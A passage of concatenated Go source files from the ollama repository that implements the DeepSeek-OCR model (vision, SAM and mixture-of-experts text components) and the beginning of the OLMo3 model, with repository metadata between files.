samOutputs.Reshape(ctx, -1, samOutputs.Dim(2), samOutputs.Dim(3)).Permute(ctx, 1, 0, 2, 3) visionOutputs = visionOutputs.Slice(ctx, 1, 1, visionOutputs.Dim(1), 1) localOutputs := visionOutputs.Concat(ctx, samOutputs, 0) localOutputs = m.Projector.Forward(ctx, localOutputs) hw := int(math.Sqrt(float64(localOutputs.Dim(1)))) localOutputs = localOutputs.Reshape(ctx, -1, hw, crop[0], crop[1]) localOutputs = localOutputs.Permute(ctx, 0, 2, 1, 3) localOutputs = localOutputs.Contiguous(ctx, -1, crop[0]*hw, crop[1]*hw) localOutputs = localOutputs.Concat(ctx, m.ImageNewline.Repeat(ctx, 2, localOutputs.Dim(2)), 1) localOutputs = localOutputs.Reshape(ctx, localOutputs.Dim(0), -1) outputs = append(outputs, localOutputs) } samOutputs := m.Sam.Forward(ctx, original) visionOutputs := m.Vision.Forward(ctx, original, samOutputs) samOutputs = samOutputs.Reshape(ctx, -1, samOutputs.Dim(2), samOutputs.Dim(3)).Permute(ctx, 1, 0, 2, 3) visionOutputs = visionOutputs.Slice(ctx, 1, 1, visionOutputs.Dim(1), 1) globalOutputs := visionOutputs.Concat(ctx, samOutputs, 0) globalOutputs = m.Projector.Forward(ctx, globalOutputs) hw := int(math.Sqrt(float64(globalOutputs.Dim(1)))) globalOutputs = globalOutputs.Reshape(ctx, -1, hw, hw) globalOutputs = globalOutputs.Concat(ctx, m.ImageNewline.Repeat(ctx, 2, globalOutputs.Dim(2)), 1) globalOutputs = globalOutputs.Reshape(ctx, globalOutputs.Dim(0), -1) outputs = append(outputs, globalOutputs, m.ViewSeperator) return []input.Multimodal{ {Tensor: outputs[0].Stack(ctx, 1, outputs[1:]...)}, }, nil } func (m *Model) PostTokenize(inputs []*input.Input) ([]*input.Input, error) { outputs := make([]*input.Input, 0, len(inputs)) for i := range inputs { if inputs[i].Multimodal == nil { outputs = append(outputs, inputs[i]) continue } t := inputs[i].Multimodal[0].Tensor outputs = append(outputs, &input.Input{ Token: 128815, Multimodal: inputs[i].Multimodal, MultimodalHash: inputs[i].MultimodalHash, SameBatch: t.Dim(1) - 1, }) outputs = slices.Grow(outputs, t.Dim(1)-1) outputs = append(outputs, slices.Repeat([]*input.Input{{Token: 128815}}, t.Dim(1)-1)...) } return outputs, nil } func (m *Model) Forward(ctx ml.Context, batch input.Batch) (ml.Tensor, error) { inputsEmbeds := m.Text.TokenEmbedding.Forward(ctx, batch.Inputs).Duplicate(ctx) positions := ctx.Input().FromInts(batch.Positions, len(batch.Positions)) for _, mm := range batch.Multimodal { t := mm.Multimodal[0].Tensor ctx.Forward(t.Copy(ctx, inputsEmbeds.View(ctx, mm.Index*inputsEmbeds.Stride(1), t.Dim(0)*t.Dim(1)))) } hiddenStates := inputsEmbeds for i, block := range m.Text.Blocks { if m.Cache != nil { m.Cache.SetLayer(i) } var outputs ml.Tensor if i == len(m.Text.Blocks)-1 { outputs = batch.Outputs } hiddenStates = block.Forward(ctx, hiddenStates, positions, outputs, m.Cache, m.Text.Options) } hiddenStates = m.Text.OutputNorm.Forward(ctx, hiddenStates, m.Text.Options.eps) return m.Text.Output.Forward(ctx, hiddenStates), nil } func init() { model.Register("deepseekocr", func(c fs.Config) (model.Model, error) { textBlocks := make([]textBlock, c.Uint("block_count")) leadingDenseBlockCount := int(c.Uint("leading_dense_block_count", 1)) for i := range textBlocks { if i >= leadingDenseBlockCount { textBlocks[i].FeedForward = &textMoe{} } else { textBlocks[i].FeedForward = &textMLP{} } } m := Model{ TextProcessor: model.NewBytePairEncoding( &model.Vocabulary{ Values: c.Strings("tokenizer.ggml.tokens"), Types: c.Ints("tokenizer.ggml.token_type"), Merges: c.Strings("tokenizer.ggml.merges"), AddBOS: c.Bool("tokenizer.ggml.add_bos_token", true), BOS: []int32{int32(c.Uint("tokenizer.ggml.bos_token_id"))}, AddEOS: c.Bool("tokenizer.ggml.add_eos_token", false), EOS: append( []int32{int32(c.Uint("tokenizer.ggml.eos_token_id"))}, c.Ints("tokenizer.ggml.eos_token_ids")..., ), }, // Split regex into multiple parts (according to DeepSeek3's regex) "\\p{N}{1,3}", `[一-龥぀-ゟ゠-ヿ]+`, "[!\"#$%&'()*+,\\-./:;<=>?@\\[\\\\\\]^_`{|}~][A-Za-z]+|[^\r\n\\p{L}\\p{P}\\p{S}]?[\\p{L}\\p{M}]+| ?[\\p{P}\\p{S}]+[\r\n]*|\\s*[\r\n]+|\\s+(?!\\S)|\\s+", ), Text: &textModel{ Blocks: textBlocks, Options: textOptions{ hiddenSize: int(c.Uint("embedding_length")), numHeads: int(c.Uint("attention.head_count")), numKVHeads: int(c.Uint("attention.head_count_kv")), numExperts: int(c.Uint("expert_count")), numExpertsUsed: int(c.Uint("expert_used_count")), ropeBase: c.Float("rope.freq_base", 10_000), ropeScale: c.Float("rope.scaling.factor", 1.0), eps: c.Float("attention.layer_norm_rms_epsilon", 1e-6), }, }, Vision: &visionModel{ Blocks: make([]visionBlock, c.Uint("vision.block_count")), Options: visionOptions{ hiddenSize: int(c.Uint("vision.embedding_length")), numHeads: int(c.Uint("vision.head_count")), imageSize: int(c.Uint("vision.image_size", 224)), patchSize: int(c.Uint("vision.patch_size", 14)), eps: c.Float("vision.attention.layer_norm_epsilon", 1e-5), }, }, Sam: &samModel{ Blocks: make([]samBlock, c.Uint("sam.block_count")), Options: samOptions{ hiddenSize: int(c.Uint("sam.embedding_length")), numHeads: int(c.Uint("sam.head_count")), eps: c.Float("sam.attention.layer_norm_epsilon", 1e-6), globalAttentionLayers: c.Ints("sam.global_attention_indexes"), }, }, } m.Cache = kvcache.NewCausalCache(m.Text.Shift) return &m, nil }) }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/deepseekocr/model_vision.go
model/models/deepseekocr/model_vision.go
package deepseekocr import ( "math" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn" ) type visionModel struct { PatchEmbedding *nn.Conv2D `gguf:"patch_embd"` ClassEmbedding ml.Tensor `gguf:"class_embd"` PositionEmbedding *nn.Embedding `gguf:"position_embd"` PreLayerNorm *nn.LayerNorm `gguf:"pre_layrnorm"` Blocks []visionBlock `gguf:"blk"` Options visionOptions } func (m *visionModel) absolutePositionEmbedding(ctx ml.Context, embeds ml.Tensor) ml.Tensor { numPatches := m.Options.imageSize / m.Options.patchSize * m.Options.imageSize / m.Options.patchSize positions := ctx.Arange(0, float32(numPatches+1), 1, ml.DTypeI32) positionEmbeds := m.PositionEmbedding.Forward(ctx, positions) source := int(math.Sqrt(float64(positionEmbeds.Dim(1) - 1))) target := int(math.Sqrt(float64(embeds.Dim(1) - 1))) if source != target { newPositionEmbeds := positionEmbeds.Slice(ctx, 1, 1, positionEmbeds.Dim(1), 1) newPositionEmbeds = newPositionEmbeds.Reshape(ctx, -1, source, source) newPositionEmbeds = newPositionEmbeds.Permute(ctx, 2, 0, 1, 3).Contiguous(ctx) newPositionEmbeds = newPositionEmbeds.Interpolate(ctx, [4]int{target, target, embeds.Dim(0), 1}, ml.SamplingModeBilinear) newPositionEmbeds = newPositionEmbeds.Permute(ctx, 1, 2, 0, 3) newPositionEmbeds = newPositionEmbeds.Contiguous(ctx, -1, target*target) positionEmbeds = positionEmbeds.Slice(ctx, 1, 0, 1, 1).Concat(ctx, newPositionEmbeds, 1) } return positionEmbeds } func (m *visionModel) Forward(ctx ml.Context, pixelValues, patchEmbeds ml.Tensor) ml.Tensor { if patchEmbeds == nil { patchEmbeds = m.PatchEmbedding.Forward(ctx, pixelValues, m.Options.patchSize, m.Options.patchSize, 0, 0, 1, 1) } patchEmbeds = patchEmbeds.Reshape(ctx, -1, patchEmbeds.Dim(2), patchEmbeds.Dim(3)) patchEmbeds = patchEmbeds.Permute(ctx, 1, 0, 2, 3).Contiguous(ctx) classEmbeds := m.ClassEmbedding.Repeat(ctx, 2, patchEmbeds.Dim(2)) embeds := classEmbeds.Concat(ctx, patchEmbeds, 1) embeds = embeds.Add(ctx, m.absolutePositionEmbedding(ctx, embeds)) hiddenStates := m.PreLayerNorm.Forward(ctx, embeds, m.Options.eps) for _, block := range m.Blocks { hiddenStates = block.Forward(ctx, hiddenStates, m.Options) } return hiddenStates } type visionOptions struct { hiddenSize, numHeads int eps float32 imageSize, patchSize int } func (o visionOptions) headDim() int { return o.hiddenSize / o.numHeads } type visionBlock struct { Norm1 *nn.LayerNorm `gguf:"layer_norm1"` Attention *visionAttention `gguf:"self_attn"` Norm2 *nn.LayerNorm `gguf:"layer_norm2"` FeedForward *visionMLP `gguf:"mlp"` } func (m *visionBlock) Forward(ctx ml.Context, hiddenStates ml.Tensor, opts visionOptions) ml.Tensor { residual := hiddenStates hiddenStates = m.Norm1.Forward(ctx, hiddenStates, opts.eps) hiddenStates = m.Attention.Forward(ctx, hiddenStates, opts) hiddenStates = hiddenStates.Add(ctx, residual) residual = hiddenStates hiddenStates = m.Norm2.Forward(ctx, hiddenStates, opts.eps) hiddenStates = m.FeedForward.Forward(ctx, hiddenStates) hiddenStates = hiddenStates.Add(ctx, residual) return hiddenStates } type visionAttention struct { QKV *nn.Linear `gguf:"qkv_proj"` Output *nn.Linear `gguf:"out_proj"` } func (m *visionAttention) Forward(ctx ml.Context, t ml.Tensor, opts visionOptions) ml.Tensor { qkv := m.QKV.Forward(ctx, t) qkv = qkv.Reshape(ctx, opts.headDim(), -1, qkv.Dim(1), qkv.Dim(2)) chunks := qkv.Chunk(ctx, 1, opts.numHeads) query, key, value := chunks[0], chunks[1], chunks[2] attention := nn.Attention(ctx, query, key, value, 1/math.Sqrt(float64(opts.headDim())), nil) attention = attention.Reshape(ctx, -1, attention.Dim(2), attention.Dim(3)) return m.Output.Forward(ctx, attention) } type visionMLP struct { FC1 *nn.Linear `gguf:"fc1"` FC2 *nn.Linear `gguf:"fc2"` } func (m *visionMLP) Forward(ctx ml.Context, t ml.Tensor) ml.Tensor { return m.FC2.Forward(ctx, m.FC1.Forward(ctx, t).QuickGELU(ctx)) }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/deepseekocr/model_text.go
model/models/deepseekocr/model_text.go
package deepseekocr import ( "math" "github.com/ollama/ollama/kvcache" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn" "github.com/ollama/ollama/ml/nn/rope" ) type textModel struct { TokenEmbedding *nn.Embedding `gguf:"token_embd"` Blocks []textBlock `gguf:"blk"` OutputNorm *nn.RMSNorm `gguf:"output_norm"` Output *nn.Linear `gguf:"output"` Options textOptions } func (m *textModel) Shift(ctx ml.Context, layer int, key, shift ml.Tensor) (ml.Tensor, error) { return m.Options.applyRotaryPositionEmbeddings(ctx, key, shift), nil } type textOptions struct { hiddenSize, numHeads, numKVHeads, numExperts, numExpertsUsed int ropeBase, ropeScale, eps float32 } func (o textOptions) headDim() int { return o.hiddenSize / o.numHeads } func (o textOptions) applyRotaryPositionEmbeddings(ctx ml.Context, states, positions ml.Tensor) ml.Tensor { return nn.RoPE(ctx, states, positions, o.headDim(), o.ropeBase, 1/o.ropeScale, rope.WithTypeNeoX()) } type textBlock struct { AttentionNorm *nn.RMSNorm `gguf:"attn_norm"` Attention *textAttention MLPNNorm *nn.RMSNorm `gguf:"ffn_norm"` FeedForward textFeedForward } func (m *textBlock) Forward(ctx ml.Context, hiddenStates, positions, outputs ml.Tensor, cache kvcache.Cache, opts textOptions) ml.Tensor { residual := hiddenStates hiddenStates = m.AttentionNorm.Forward(ctx, hiddenStates, opts.eps) hiddenStates = m.Attention.Forward(ctx, hiddenStates, positions, cache, opts) if outputs != nil { hiddenStates = hiddenStates.Rows(ctx, outputs) residual = residual.Rows(ctx, outputs) } hiddenStates = hiddenStates.Add(ctx, residual) residual = hiddenStates hiddenStates = m.MLPNNorm.Forward(ctx, hiddenStates, opts.eps) hiddenStates = m.FeedForward.Forward(ctx, hiddenStates, opts) return hiddenStates.Add(ctx, residual) } type textAttention struct { Query *nn.Linear `gguf:"attn_q"` Key *nn.Linear `gguf:"attn_k"` Value *nn.Linear `gguf:"attn_v"` Output *nn.Linear `gguf:"attn_output"` } func (m *textAttention) Forward(ctx ml.Context, hiddenStates, positions ml.Tensor, cache kvcache.Cache, opts textOptions) ml.Tensor { query := m.Query.Forward(ctx, hiddenStates) query = query.Reshape(ctx, opts.headDim(), opts.numHeads, -1) key := m.Key.Forward(ctx, hiddenStates) key = key.Reshape(ctx, opts.headDim(), opts.numKVHeads, -1) value := m.Value.Forward(ctx, hiddenStates) value = value.Reshape(ctx, opts.headDim(), opts.numKVHeads, -1) query = opts.applyRotaryPositionEmbeddings(ctx, query, positions) key = opts.applyRotaryPositionEmbeddings(ctx, key, positions) attention := nn.Attention(ctx, query, key, value, 1./math.Sqrt(float64(opts.headDim())), cache) attention = attention.Reshape(ctx, -1, attention.Dim(2)) return m.Output.Forward(ctx, attention) } type textFeedForward interface { Forward(ml.Context, ml.Tensor, textOptions) ml.Tensor } type textMoe struct { Router *nn.Linear `gguf:"ffn_gate_inp"` Gate *nn.LinearBatch `gguf:"ffn_gate_exps"` Up *nn.LinearBatch `gguf:"ffn_up_exps"` Down *nn.LinearBatch `gguf:"ffn_down_exps"` SharedExperts *textMLP `gguf:",suf:_shexp"` } func (m *textMoe) Forward(ctx ml.Context, hiddenStates ml.Tensor, opts textOptions) ml.Tensor { scores := m.Router.Forward(ctx, hiddenStates).Softmax(ctx) indices := scores.TopK(ctx, opts.numExpertsUsed) weights := scores.Reshape(ctx, 1, opts.numExperts, hiddenStates.Dim(1)).Rows(ctx, indices) experts := hiddenStates.Reshape(ctx, hiddenStates.Dim(0), 1, hiddenStates.Dim(1)) experts = m.Gate.Forward(ctx, experts, indices).SILU(ctx, m.Up.Forward(ctx, experts, indices)) experts = m.Down.Forward(ctx, experts, indices) experts = experts.Mul(ctx, weights) expert := func(i int) ml.Tensor { return experts.View( ctx, i*experts.Stride(1), experts.Dim(0), experts.Stride(2), experts.Dim(2), ) } routedStates := expert(0) for i := 1; i < opts.numExpertsUsed; i++ { routedStates = routedStates.Add(ctx, expert(i)) } sharedStates := m.SharedExperts.Forward(ctx, hiddenStates, opts) return routedStates.Add(ctx, sharedStates) } type textMLP struct { Gate *nn.Linear `gguf:"ffn_gate"` Up *nn.Linear `gguf:"ffn_up"` Down *nn.Linear `gguf:"ffn_down"` } func (m *textMLP) Forward(ctx ml.Context, hiddenStates ml.Tensor, _ textOptions) ml.Tensor { hiddenStates = m.Gate.Forward(ctx, hiddenStates).SILU(ctx, m.Up.Forward(ctx, hiddenStates)) return m.Down.Forward(ctx, hiddenStates) }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/deepseekocr/model_sam.go
model/models/deepseekocr/model_sam.go
package deepseekocr import ( "math" "slices" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn" ) type samModel struct { PatchEmbedding *nn.Conv2D `gguf:"patch_embd"` PositionEmbedding ml.Tensor `gguf:"position_embd"` Blocks []samBlock `gguf:"blk"` Neck *samNeck `gguf:"neck"` Net2 *nn.Conv2D `gguf:"net_2"` Net3 *nn.Conv2D `gguf:"net_3"` Options samOptions } func (m *samModel) absolutePositionEmbedding(ctx ml.Context, hiddenStates ml.Tensor) ml.Tensor { source := m.PositionEmbedding.Dim(1) target := hiddenStates.Dim(2) if source != target { positionEmbed := m.PositionEmbedding.Permute(ctx, 2, 0, 1, 3) positionEmbed = positionEmbed.Interpolate(ctx, [4]int{target, target, hiddenStates.Dim(0), 1}, ml.SamplingModeBilinear) return positionEmbed.Permute(ctx, 1, 2, 0, 3).Contiguous(ctx) } return m.PositionEmbedding } func (m *samModel) Forward(ctx ml.Context, t ml.Tensor) ml.Tensor { hiddenStates := m.PatchEmbedding.Forward(ctx, t, 16, 16, 0, 0, 1, 1) hiddenStates = hiddenStates.Permute(ctx, 1, 2, 0, 3).Contiguous(ctx) if m.PositionEmbedding != nil { hiddenStates = hiddenStates.Add(ctx, m.absolutePositionEmbedding(ctx, hiddenStates)) } for i, block := range m.Blocks { var windowSize int if !slices.Contains(m.Options.globalAttentionLayers, int32(i)) { windowSize = 14 } hiddenStates = block.Forward(ctx, hiddenStates, windowSize, m.Options) } hiddenStates = hiddenStates.Permute(ctx, 2, 0, 1, 3).Contiguous(ctx) hiddenStates = m.Neck.Forward(ctx, hiddenStates, m.Options) hiddenStates = m.Net2.Forward(ctx, hiddenStates, 2, 2, 1, 1, 1, 1) hiddenStates = m.Net3.Forward(ctx, hiddenStates, 2, 2, 1, 1, 1, 1) return hiddenStates } type samOptions struct { hiddenSize, numHeads int eps float32 globalAttentionLayers []int32 } func (o samOptions) headDim() int { return o.hiddenSize / o.numHeads } type samBlock struct { Norm1 *nn.LayerNorm `gguf:"norm1"` Attention *samAttention `gguf:"attn"` Norm2 *nn.LayerNorm `gguf:"norm2"` FeedForward *samMLP `gguf:"mlp"` } func (m *samBlock) Forward(ctx ml.Context, hiddenStates ml.Tensor, windowSize int, opts samOptions) ml.Tensor { c, w, h := hiddenStates.Dim(0), hiddenStates.Dim(1), hiddenStates.Dim(2) residual := hiddenStates hiddenStates = m.Norm1.Forward(ctx, hiddenStates, opts.eps) var pw, ph int if windowSize > 0 { pw = (windowSize - hiddenStates.Dim(1)%windowSize) % windowSize ph = (windowSize - hiddenStates.Dim(2)%windowSize) % windowSize if pw > 0 || ph > 0 { hiddenStates = hiddenStates.Pad(ctx, 0, pw, ph, 0) } hiddenStates = hiddenStates.Reshape(ctx, c*windowSize, (w+pw)/windowSize, windowSize, -1) hiddenStates = hiddenStates.Permute(ctx, 0, 2, 1, 3).Contiguous(ctx, c, windowSize, windowSize, -1) } hiddenStates = m.Attention.Forward(ctx, hiddenStates, opts) if windowSize > 0 { hiddenStates = hiddenStates.Reshape(ctx, c*windowSize, windowSize, (w+pw)/windowSize, -1) hiddenStates = hiddenStates.Permute(ctx, 0, 2, 1, 3) hiddenStates = hiddenStates.Contiguous(ctx, c, w+pw, h+ph, -1) hiddenStates = hiddenStates.Pad(ctx, 0, -pw, -ph, 0) } hiddenStates = hiddenStates.Add(ctx, residual) residual = hiddenStates hiddenStates = m.Norm2.Forward(ctx, hiddenStates, opts.eps) hiddenStates = m.FeedForward.Forward(ctx, hiddenStates, opts) return hiddenStates.Add(ctx, residual) } type samAttention struct { QKV *nn.Linear `gguf:"qkv"` Output *nn.Linear `gguf:"proj"` RelativePosition *struct { Height ml.Tensor `gguf:"h"` Width ml.Tensor `gguf:"w"` } `gguf:",pre:rel_pos_"` } func relativeCoordinates(ctx ml.Context, qn, kn int) ml.Tensor { s := make([]int32, qn*kn) for i := range qn { for j := range kn { q := i * max(kn/qn, 1) k := j * max(qn/kn, 1) s[i*kn+j] = int32(q - k + (kn-1)*max(qn/kn, 1)) } } return ctx.Input().FromInts(s, qn*kn) } func relativePositions(ctx ml.Context, positions ml.Tensor, qn, kn int) ml.Tensor { maxRelativeDistance := 2*max(qn, kn) - 1 if positions.Dim(1) != maxRelativeDistance { // linear interpolation kernel not available so approx. with bilinear interpolation positions = positions.Interpolate(ctx, [4]int{positions.Dim(0), maxRelativeDistance, 1, 1}, ml.SamplingModeBilinear) } rc := relativeCoordinates(ctx, qn, kn) return positions.Rows(ctx, rc).Reshape(ctx, positions.Dim(0), kn, qn) } func (m *samAttention) decomposedRelativePositions(ctx ml.Context, query ml.Tensor, qn, kn []int) (ml.Tensor, ml.Tensor) { qh, qw := qn[0], qn[1] kh, kw := kn[0], kn[1] rh := relativePositions(ctx, m.RelativePosition.Height, qh, kh) rw := relativePositions(ctx, m.RelativePosition.Width, qw, kw) query = query.Contiguous(ctx, query.Dim(0), qw, qh, -1) rh = rh.Mulmat(ctx, query).Reshape(ctx, 1, kh, qh*qw, -1) rw = rw.Mulmat(ctx, query.Permute(ctx, 0, 2, 1, 3)).Permute(ctx, 0, 2, 1, 3).Contiguous(ctx, kw, 1, qh*qw, -1) return rh, rw } func (m *samAttention) Forward(ctx ml.Context, hiddenStates ml.Tensor, opts samOptions) ml.Tensor { w, h, b := hiddenStates.Dim(1), hiddenStates.Dim(2), hiddenStates.Dim(3) qkv := m.QKV.Forward(ctx, hiddenStates) qkv = qkv.Reshape(ctx, opts.headDim(), -1, w*h, b) chunks := qkv.Chunk(ctx, 1, opts.numHeads) query, key, value := chunks[0], chunks[1], chunks[2] ctx.Forward(query, key, value) query = query.Permute(ctx, 0, 2, 1, 3) rh, rw := m.decomposedRelativePositions(ctx, query, []int{h, w}, []int{h, w}) mask := rh.Repeat(ctx, 0, rw.Dim(0)).Add(ctx, rw) mask = mask.Reshape(ctx, h*w, -1, opts.numHeads, b) key = key.Permute(ctx, 0, 2, 1, 3) scores := key.MulmatFullPrec(ctx, query) scores = scores.Scale(ctx, 1/math.Sqrt(float64(opts.headDim()))) scores = scores.Add(ctx, mask) scores = scores.Softmax(ctx) value = value.Permute(ctx, 1, 2, 0, 3).Contiguous(ctx) attention := value.Mulmat(ctx, scores) attention = attention.Permute(ctx, 0, 2, 1, 3) attention = attention.Contiguous(ctx, -1, w, h, b) return m.Output.Forward(ctx, attention) } type samMLP struct { Lin1 *nn.Linear `gguf:"lin1"` Lin2 *nn.Linear `gguf:"lin2"` } func (m *samMLP) Forward(ctx ml.Context, hiddenStates ml.Tensor, opts samOptions) ml.Tensor { return m.Lin2.Forward(ctx, m.Lin1.Forward(ctx, hiddenStates).GELU(ctx)) } type LayerNorm2D struct { Weight ml.Tensor `gguf:"weight"` Bias ml.Tensor `gguf:"bias"` } func (ln *LayerNorm2D) Forward(ctx ml.Context, x ml.Tensor, eps float32) ml.Tensor { x = x.Permute(ctx, 1, 2, 0, 3).Contiguous(ctx) u := x.Mean(ctx) d := x.Sub(ctx, u) s := d.Sqr(ctx).Mean(ctx) x = d.Div(ctx, s.Add(ctx, ctx.Input().FromFloats([]float32{eps}, 1)).Sqrt(ctx)) x = x.Mul(ctx, ln.Weight).Add(ctx, ln.Bias) return x.Permute(ctx, 2, 0, 1, 3).Contiguous(ctx) } type samNeck struct { C1 *nn.Conv2D `gguf:"0"` LN1 *LayerNorm2D `gguf:"1"` C2 *nn.Conv2D `gguf:"2"` LN2 *LayerNorm2D `gguf:"3"` } func (m *samNeck) Forward(ctx ml.Context, hiddenStates ml.Tensor, opts samOptions) ml.Tensor { hiddenStates = m.C1.Forward(ctx, hiddenStates, 1, 1, 0, 0, 1, 1) hiddenStates = m.LN1.Forward(ctx, hiddenStates, opts.eps) hiddenStates = m.C2.Forward(ctx, hiddenStates, 1, 1, 1, 1, 1, 1) hiddenStates = m.LN2.Forward(ctx, hiddenStates, opts.eps) return hiddenStates }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/olmo3/model.go
model/models/olmo3/model.go
package olmo3 import ( "fmt" "math" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/kvcache" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn" "github.com/ollama/ollama/ml/nn/rope" "github.com/ollama/ollama/model" "github.com/ollama/ollama/model/input" ) const ( cacheTypeSWA = 0 cacheTypeCausal = 1 ) type Options struct { hiddenSize, numHeads, numKVHeads int eps, ropeBase, ropeScale float32 originalContextLength int attnFactor float32 ropeType string ropeExtrapolation float32 slidingWindowPattern []bool } type Model struct { model.Base model.TextProcessor TokenEmbedding *nn.Embedding `gguf:"token_embd"` Layers []Layer `gguf:"blk"` OutputNorm *nn.RMSNorm `gguf:"output_norm"` Output *nn.Linear `gguf:"output,alt:token_embd"` Options } func New(c fs.Config) (model.Model, error) { vocabulary := model.Vocabulary{ Values: c.Strings("tokenizer.ggml.tokens"), Scores: c.Floats("tokenizer.ggml.scores"), Types: c.Ints("tokenizer.ggml.token_type"), Merges: c.Strings("tokenizer.ggml.merges"), AddBOS: c.Bool("tokenizer.ggml.add_bos_token", false), BOS: []int32{int32(c.Uint("tokenizer.ggml.bos_token_id"))}, AddEOS: c.Bool("tokenizer.ggml.add_eos_token", false), EOS: append( []int32{int32(c.Uint("tokenizer.ggml.eos_token_id"))}, c.Ints("tokenizer.ggml.eos_token_ids")..., ), } processor := model.NewBytePairEncoding( &vocabulary, "(?i:'s|'t|'re|'ve|'m|'ll|'d)|[^\\r\\n\\p{L}\\p{N}]?\\p{L}+|\\p{N}{1,3}| ?[^\\s\\p{L}\\p{N}]+[\\r\\n]*|\\s*[\\r\\n]+|\\s+(?!\\S)|\\s+", ) m := Model{ TextProcessor: processor, Layers: make([]Layer, c.Uint("block_count")), Options: Options{ hiddenSize: int(c.Uint("embedding_length")), numHeads: int(c.Uint("attention.head_count")), numKVHeads: int(c.Uint("attention.head_count_kv")), eps: c.Float("attention.layer_norm_rms_epsilon"), ropeBase: c.Float("rope.freq_base", 1e4), ropeScale: c.Float("rope.scaling.factor", 1), originalContextLength: int(c.Uint("rope.scaling.original_context_length")), attnFactor: c.Float("rope.scaling.attn_factor", 1), ropeType: c.String("rope.scaling.type"), ropeExtrapolation: c.Float("rope.scaling.extrapolation_factor", 1.0), slidingWindowPattern: c.Bools("attention.sliding_window_pattern"), }, } m.Cache = kvcache.NewWrapperCache( kvcache.NewSWACache(int32(c.Uint("attention.sliding_window")), m.Shift), kvcache.NewCausalCache(m.Shift), ) return &m, nil } type SelfAttention struct { Query *nn.Linear `gguf:"attn_q"` Key *nn.Linear `gguf:"attn_k"` Value *nn.Linear `gguf:"attn_v"` Output *nn.Linear `gguf:"attn_output"` QNorm *nn.RMSNorm `gguf:"attn_q_norm"` KNorm *nn.RMSNorm `gguf:"attn_k_norm"` } func (o Options) applyRotaryPositionEmbeddings(ctx ml.Context, states, positions ml.Tensor, isSWA bool) ml.Tensor { freqScale := float32(1.0) ropeOpts := []func(*rope.Options){rope.WithTypeNeoX()} if !isSWA { freqScale = 1. / o.ropeScale if o.originalContextLength > 0 { ropeOpts = append(ropeOpts, rope.WithOriginalContextLength(o.originalContextLength), rope.WithExtrapolationFactor(o.ropeExtrapolation), ) } } return nn.RoPE(ctx, states, positions, o.hiddenSize/o.numHeads, o.ropeBase, freqScale, ropeOpts...) } func (sa *SelfAttention) Forward(ctx ml.Context, hiddenState, positions ml.Tensor, cache kvcache.Cache, m *Model, isSWA bool) ml.Tensor { batchSize := hiddenState.Dim(1) headDim := m.hiddenSize / m.numHeads query := sa.Query.Forward(ctx, hiddenState) query = sa.QNorm.Forward(ctx, query, m.eps) query = query.Reshape(ctx, headDim, m.numHeads, batchSize) query = m.Options.applyRotaryPositionEmbeddings(ctx, query, positions, isSWA) key := sa.Key.Forward(ctx, hiddenState) key = sa.KNorm.Forward(ctx, key, m.eps) key = key.Reshape(ctx, headDim, m.numKVHeads, batchSize) key = m.Options.applyRotaryPositionEmbeddings(ctx, key, positions, isSWA) value := sa.Value.Forward(ctx, hiddenState) value = value.Reshape(ctx, headDim, m.numKVHeads, batchSize) attention := nn.Attention(ctx, query, key, value, 1.0/math.Sqrt(float64(headDim)), cache) attention = attention.Reshape(ctx, m.hiddenSize, batchSize) return sa.Output.Forward(ctx, attention) } func (m *Model) Shift(ctx ml.Context, layer int, key, shift ml.Tensor) (ml.Tensor, error) { isSWA := m.isSWALayer(layer) return m.Options.applyRotaryPositionEmbeddings(ctx, key, shift, isSWA), nil } type MLP struct { Up *nn.Linear `gguf:"ffn_up"` Down *nn.Linear `gguf:"ffn_down"` Gate *nn.Linear `gguf:"ffn_gate"` } func (mlp *MLP) Forward(ctx ml.Context, hiddenState ml.Tensor, m *Model) ml.Tensor { hiddenState = mlp.Gate.Forward(ctx, hiddenState).SILU(ctx, mlp.Up.Forward(ctx, hiddenState)) return mlp.Down.Forward(ctx, hiddenState) } type Layer struct { SelfAttention *SelfAttention PostAttentionNorm *nn.RMSNorm `gguf:"post_attention_norm"` MLP *MLP PostFFWNorm *nn.RMSNorm `gguf:"post_ffw_norm"` } func (l *Layer) Forward(ctx ml.Context, hiddenState, positions, outputs ml.Tensor, cache kvcache.Cache, m *Model, isSWA bool) ml.Tensor { residual := hiddenState hiddenState = l.SelfAttention.Forward(ctx, hiddenState, positions, cache, m, isSWA) if outputs != nil { hiddenState = hiddenState.Rows(ctx, outputs) residual = residual.Rows(ctx, outputs) } hiddenState = l.PostAttentionNorm.Forward(ctx, hiddenState, m.eps) hiddenState = hiddenState.Add(ctx, residual) residual = hiddenState hiddenState = l.MLP.Forward(ctx, hiddenState, m) hiddenState = l.PostFFWNorm.Forward(ctx, hiddenState, m.eps) return hiddenState.Add(ctx, residual) } // OLMo3 has Sliding Window Attention (SWA) for 3 out of every 4 layers. func (m *Model) isSWALayer(layerIdx int) bool { return m.Options.slidingWindowPattern[layerIdx] } func (m *Model) Forward(ctx ml.Context, batch input.Batch) (ml.Tensor, error) { positions := ctx.Input().FromInts(batch.Positions, len(batch.Positions)) hiddenState := m.TokenEmbedding.Forward(ctx, batch.Inputs) for i, layer := range m.Layers { m.Cache.SetLayer(i) cacheType := cacheTypeSWA isSWA := m.isSWALayer(i) if !isSWA { cacheType = cacheTypeCausal } wc, ok := m.Cache.(*kvcache.WrapperCache) if !ok { return nil, fmt.Errorf("expected *kvcache.WrapperCache, got %T", m.Cache) } wc.SetLayerType(cacheType) var outputs 